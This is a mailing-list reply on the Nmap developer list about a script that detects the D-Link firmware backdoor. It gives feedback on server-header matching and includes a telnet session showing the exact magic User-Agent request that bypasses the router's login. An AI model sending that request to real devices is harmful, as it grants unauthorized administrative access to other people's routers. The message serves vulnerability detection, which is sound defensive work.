Re: D-Link firmware backdoor

[Michael Meyer <michael.meyer () greenbone net>]

*** Patrik Karlsson wrote:

> Please find a script attached to detect the D-Link firmware bypass outlined
> in this article:
> http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
>
> It's been a while since I committed something, so I will wait for some
> feedback before I do.

Just a note about...

> and server:match("^thttpd%-alphanetworks"))

On some affected devices the server header is 'Server: Alpha_webserv'
instead of 'Server: thttpd-alphanetworks/'...

> if ( response.status == 200 )

...and there are also some devices which do not send a header
at all when this fake user-agent is set. On such devices you
could check for the existence of 'self.location.href' after
successfully bypassing the login.

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Server: thttpd-alphanetworks/2.23
Content-Type: text/html
Date: Tue, 15 Oct 2013 11:51:23 GMT
Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT
Accept-Ranges: bytes
Connection: close
WWW-Authenticate: Basic realm="BRL-04UR"

<HTML><HEAD><TITLE>401 Unauthorized</TITLE>
[...]

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0
User-Agent: xmlset_roodkcableoj28840ybtide

<HTML>
<HEAD>
<TITLE>BRL-04UR</TITLE>
[...]
   self.location.href="index1.htm";
[...]

Micha

-- 
Michael Meyer                            OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG
Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/